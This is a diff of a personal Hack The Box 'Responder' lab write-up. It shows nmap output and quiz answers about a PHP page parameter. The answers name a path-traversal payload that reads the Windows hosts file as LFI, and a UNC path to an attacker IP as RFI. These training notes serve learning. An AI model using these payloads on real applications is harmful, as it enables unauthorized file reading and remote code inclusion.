comitanigiacomo/cyberSecurity/hackTheBox/startingPoint/responder.md

 |_http-server-header: Microsoft-HTTPAPI/2.0
 7680/tcp open  pando-pub?
 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
 ```

+Thus, the scripting language used is PHP.

     php

 <span style="color:cyan">**Question 3**</span>: What is the name of the URL parameter which is used to load different language versions of the webpage?

-the name of the URL parameter to do so, is `page`
+The name of the URL parameter used to load different language versions of the webpage is page.

     page

 <span style="color:cyan">**Question 4**</span>: Which of the following values for the `page` parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

+The value that would be an example of exploiting a Local File Include (LFI) vulnerability is:

     ../../../../../../../../windows/system32/drivers/etc/hosts

+This exploits the application by trying to include files from the server’s file system.

 <span style="color:cyan">**Question 5**</span>: Which of the following values for the `page` parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

     //10.10.14.6/somefile

+This allows an attacker to include files from a remote server, potentially compromising the application.

 <span style="color:cyan">**Question 6**</span>: What does NTLM stand for?